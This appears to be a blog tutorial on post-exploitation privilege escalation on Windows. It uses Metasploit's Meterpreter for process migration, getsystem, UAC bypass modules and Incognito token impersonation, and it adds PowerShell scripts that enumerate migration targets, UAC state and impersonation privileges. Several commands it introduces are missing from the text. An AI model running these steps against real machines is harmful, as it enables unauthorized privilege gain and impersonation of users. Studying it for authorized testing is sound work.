Windows Privilege Escalation

What is Privilege Escalation?

Privilege escalation is an attack that exploits operating system or third-party software vulnerabilities (bugs, design flaws, misconfigurations, etc.) in order to elevate the current level of access (privileges) to protected resources. In other words, the attacker gains access to resources that he/she is not supposed to be able to access.

Privilege escalation attacks can be divided into two types:

  • Vertical: the attacker moves from a lower privileged user to a higher privileged one, for example from a standard user to Administrator or root.

  • Horizontal: the attacker keeps the same level of privileges but assumes the identity of a different user (no further privilege is gained).

For example:

  • Vertical privilege escalation: on a Linux system, the attacker escalates from an unprivileged user (such as the account an application runs as) to root.

  • Horizontal: on a Windows system, the attacker assumes the identity of any other Standard user. The attacker does not go from a Standard user to an Administrator user.

Once we have a Meterpreter session on the target, we can gather basic information about the host (OS version, architecture, domain, logged-on users) with:

meterpreter > sysinfo

Once we have exploited the machine, Meterpreter also has some very useful scripts and post modules we can run:


Don't underestimate the information gathering phase: we want to know what we are dealing with. Then we can start thinking about maintaining access. In this phase we want to make sure that our session is:

  • Stable
  • Privileged (can be run with high privileges)
  • Persistent (survives reboots)

To avoid having our session killed when the user closes the exploited program (or the process crashes), we migrate the session into another, more stable process running on the system.

We can run:


This will try to migrate the session automatically. NOTE that the process it migrates into will always be a process running with the same privileges as the current session: migrating does not escalate privileges.

If we want to choose the target process ourselves, we can list the running processes (with their PID, architecture and owner) by using the ps command:


We can now manually run:

meterpreter > migrate <PID you choose>
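The selection logic behind a manual migrate, as an added example that is not part of the original post and not Metasploit's own code. Run from a PowerShell prompt on the target (for instance through the session's shell), it lists the processes that are realistic migration candidates: owned by the same user as the current session (as noted above, migrating never gains privileges), not the current process itself, oldest first because a long-lived process is less likely to be closed under us. The Arch column is looked up with the kernel32 IsWow64Process call so it can be matched against the Arch column of the ps output; processes whose handle we cannot open are shown as unknown rather than dropped.

```powershell
# Added example, not from the original post: list migration candidates from
# a PowerShell prompt on the target. Uses only Win32_Process (CIM) and one
# documented kernel32 call.

Add-Type -Namespace Win32 -Name Kernel32 -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool IsWow64Process(IntPtr hProcess, out bool wow64);
'@

function Get-MigrationCandidates {
    $me = [Security.Principal.WindowsIdentity]::GetCurrent().Name   # DOMAIN\user of this session

    Get-CimInstance Win32_Process | ForEach-Object {
        $proc = $_
        if ($proc.ProcessId -eq $PID) { return }            # never "migrate" into ourselves

        # Same-owner filter: GetOwner fails (ReturnValue != 0) for processes whose
        # token we are not allowed to read, which rules them out as well.
        $owner = Invoke-CimMethod -InputObject $proc -MethodName GetOwner
        if ($owner.ReturnValue -ne 0) { return }
        if ("$($owner.Domain)\$($owner.User)" -ne $me) { return }

        # Bitness: on 64-bit Windows a WOW64 process is a 32-bit process.
        # Opening the handle fails for processes at a higher integrity level
        # (e.g. an elevated instance started by the same user), so report unknown.
        $arch = 'unknown'
        try {
            $h   = (Get-Process -Id $proc.ProcessId -ErrorAction Stop).Handle
            $wow = $false
            if ([Win32.Kernel32]::IsWow64Process($h, [ref]$wow)) {
                $arch = if ([Environment]::Is64BitOperatingSystem -and -not $wow) { 'x64' } else { 'x86' }
            }
        } catch { }

        [pscustomobject]@{
            PID     = $proc.ProcessId
            Name    = $proc.Name
            Arch    = $arch
            Session = $proc.SessionId
            Owner   = $me
            Started = $proc.CreationDate
        }
    } | Sort-Object Started
}

Get-MigrationCandidates | Format-Table -AutoSize
```

The oldest entries at the top (typically the shell and other session-level processes started at logon) are the ones worth passing to migrate; anything started seconds ago is likely to be short-lived.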

Once we have migrated our session, we can start the post-exploitation process.

We want persistence so we can get back in at any time. However, we also need the shell to run with the highest privileges possible.

The easiest and fastest way to get higher privileges is by running

meterpreter > getsystem

It will automatically find a technique that works to elevate privileges.

By default, the getsystem command tries all available techniques to escalate privileges. If a technique fails, it tries the next one until one of them works. If you want to run a specific technique, use the -t option as follows (getsystem -h lists the numbered techniques):

meterpreter > getsystem -t 1

Notice that depending on the current privileges on the machine, the getsystem command might fail. Its techniques all need administrative rights to begin with (creating a service for named-pipe impersonation, or duplicating a SYSTEM token). On Windows XP an Administrator user has those rights outright; on systems with User Account Control (UAC) enabled (Windows Vista and later), a session belonging to a member of the Administrators group normally runs under UAC's filtered token, so getsystem fails until we get past that protection. From a plain Standard user it fails regardless, and a real local exploit is needed instead.

Moreover, you should be aware that getsystem works only against Windows operating systems. For other operating systems, you will have to rely on different Metasploit modules. To see which modules Metasploit offers, look under exploit/[OS]/local.

Bypassing UAC

What is UAC?

User Account Control or UAC for short is a security feature of Windows which helps prevent unauthorized changes to the operating system. These changes can be initiated by applications, users, viruses or other forms of malware. User Account Control makes sure certain changes are made only with approval from the administrator. If the changes are not approved by the administrator, they are not executed, and Windows remains unchanged. It is as if nothing happened. UAC was first made available for Windows Vista, and since then it was improved with each new version of Windows.

For obvious reasons this gets in the way of an attacker.

When UAC is enabled on the remote system, the bypassuac family of modules (exploit/windows/local/bypassuac and its variants) is what we use to get past it. We can verify whether UAC is enabled by running the module post/windows/gather/win_privs. If the UAC Enabled column in the result is set to true, the remote system has UAC enabled.
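A PowerShell equivalent of that check, added here as an example that is not part of the original post and not the win_privs module itself. Run on the target, it reports the same three things (Is Admin, Is System, UAC Enabled) plus the one value that tells the two failure cases of getsystem apart: the token elevation type, read with the documented advapi32 GetTokenInformation call (TokenElevationType = 18). Limited means we are an Administrators member running on the filtered token, which is exactly when a UAC bypass is needed before getsystem will work; Default with IsAdmin false means a Standard user, for whom no UAC bypass helps. The registry key and value names are the standard UAC policy settings under HKLM.

```powershell
# Added example, not from the original post: PowerShell version of the
# win_privs check, plus the token elevation type.

Add-Type -Namespace Win32 -Name Advapi32 -MemberDefinition @'
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool GetTokenInformation(IntPtr TokenHandle, int TokenInformationClass,
    IntPtr TokenInformation, int TokenInformationLength, out int ReturnLength);
'@

function Get-TokenElevationType {
    $TokenElevationType = 18           # TOKEN_INFORMATION_CLASS::TokenElevationType
    $token = [Security.Principal.WindowsIdentity]::GetCurrent().Token   # our own token handle
    $buf   = [Runtime.InteropServices.Marshal]::AllocHGlobal(4)
    try {
        $len = 0
        if (-not [Win32.Advapi32]::GetTokenInformation($token, $TokenElevationType, $buf, 4, [ref]$len)) {
            throw "GetTokenInformation failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
        }
        switch ([Runtime.InteropServices.Marshal]::ReadInt32($buf)) {
            1 { 'Default' }   # no split token: UAC off, SYSTEM, or a non-admin user
            2 { 'Full' }      # the elevated half of an admin's token
            3 { 'Limited' }   # the filtered half: admin user, but UAC in the way
        }
    } finally {
        [Runtime.InteropServices.Marshal]::FreeHGlobal($buf)
    }
}

function Get-PrivState {
    $id  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $pr  = New-Object Security.Principal.WindowsPrincipal($id)
    $uac = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

    [pscustomobject]@{
        User          = $id.Name
        # IsInRole looks at the effective token, so it is false on a filtered
        # admin token; ElevationType is what separates that from a Standard user.
        IsAdmin       = $pr.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        IsSystem      = $id.IsSystem
        ElevationType = Get-TokenElevationType
        UACEnabled    = [bool]$uac.EnableLUA
        # 0 = admins elevate silently, 2 = always prompt, 5 = default prompt
        ConsentPromptBehaviorAdmin = $uac.ConsentPromptBehaviorAdmin
    }
}

Get-PrivState | Format-List
```

Reading the output: UACEnabled true with ElevationType Limited is the situation the rest of this section deals with; after a successful bypass the new session should show ElevationType Full and IsAdmin true, and after getsystem IsSystem true.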


Let us list the modules in Metasploit that may help us bypass the UAC protection. We can list them by searching for the string bypassuac:


The steps we will have to do are very easy:

  1. Select the bypassuac_vbs module, the newest of the modules available at the time of writing.

  2. Set the meterpreter session ID on which the module will be executed (set SESSION <id>).

  3. Run the module. If it completes, we get a new meterpreter session with higher privileges. Remember that this is a bypass, not a disable: UAC will still be enabled on the target.

If the exploit succeeds, we will obtain a new meterpreter session that has higher privileges on the machine. We can confirm this by running:

meterpreter > run post/windows/gather/win_privs


We now have admin privileges on the machine, but not the highest (Is System is false). Let us run getsystem once again; now that the session holds a full administrator token, it should work.

meterpreter > getsystem

Let us check again.



As you can see there are many ways we are able to escalate privileges and we are only scratching the surface in regards to what is possible.

Lets go "Incognito"

There is another powerful tool, a Meterpreter extension called "Incognito". Thanks to Incognito, we can impersonate other valid user tokens present on the machine and become that user. The best thing is that we do not even need to know or crack passwords to do this.

As you can imagine, being able to switch from one user to another gives us the possibility to access different local or domain resources.

Loading incognito is very simple. Once we have a meterpreter session (better with SYSTEM privileges, since that is what lets us reach other users' tokens), we can run the following command to load the incognito extension:

meterpreter > use incognito

List the user tokens available on the machine with (use -g instead of -u for group tokens):

meterpreter > list_tokens -u
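Two checks worth running before trying to impersonate, as an added example that is not part of the original post and not the incognito extension itself. Run from a PowerShell prompt on the target, the first function reports whether our current token holds the privileges token impersonation relies on (SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege to use a stolen token, SeDebugPrivilege to open other processes to get at one), parsed from whoami /priv and assuming an English-language Windows for the Enabled/Disabled column. The second lists which accounts own running processes; each of those is, approximately, a token a SYSTEM-level session could pick up, which is why list_tokens shows more from SYSTEM than from a plain user.

```powershell
# Added example, not from the original post: what our token can do, and whose
# tokens are around. Assumes an English locale for the whoami /priv output.

function Get-ImpersonationPrivs {
    $wanted = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeDebugPrivilege'
    # whoami /priv prints a header block, then one "Name  Description  State" row per privilege
    $rows = whoami /priv | Where-Object { $_ -match '^Se\w+Privilege\s' }
    foreach ($name in $wanted) {
        $line = $rows | Where-Object { $_ -match "^$name\s" }
        [pscustomobject]@{
            Privilege = $name
            Present   = [bool]$line                               # absent entirely = cannot be enabled
            Enabled   = [bool]($line -and $line -match 'Enabled\s*$')
        }
    }
}

function Get-TokenPool {
    # Distinct owners of running processes. From a Standard user only our own
    # processes answer GetOwner; from SYSTEM every account on the box shows up.
    Get-CimInstance Win32_Process | ForEach-Object {
        $o = Invoke-CimMethod -InputObject $_ -MethodName GetOwner
        if ($o.ReturnValue -eq 0 -and $o.User) { "$($o.Domain)\$($o.User)" }
    } | Group-Object | Sort-Object Count -Descending |
        Select-Object @{ n = 'Account'; e = { $_.Name } }, @{ n = 'Processes'; e = { $_.Count } }
}

Get-ImpersonationPrivs | Format-Table -AutoSize
Get-TokenPool | Format-Table -AutoSize
```

If SeImpersonatePrivilege and SeDebugPrivilege show Present true but Enabled false, that is normal: Incognito enables them on the token before use. If they are not present at all, the session is not privileged enough and getsystem (or a UAC bypass first) is the step to go back to.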

Impersonate another user with:


This concludes a basic run-down of Windows privilege escalation. There are many more ways to do privesc, not to mention things like unquoted service paths.

Comments (1)

Jin

Great write-up!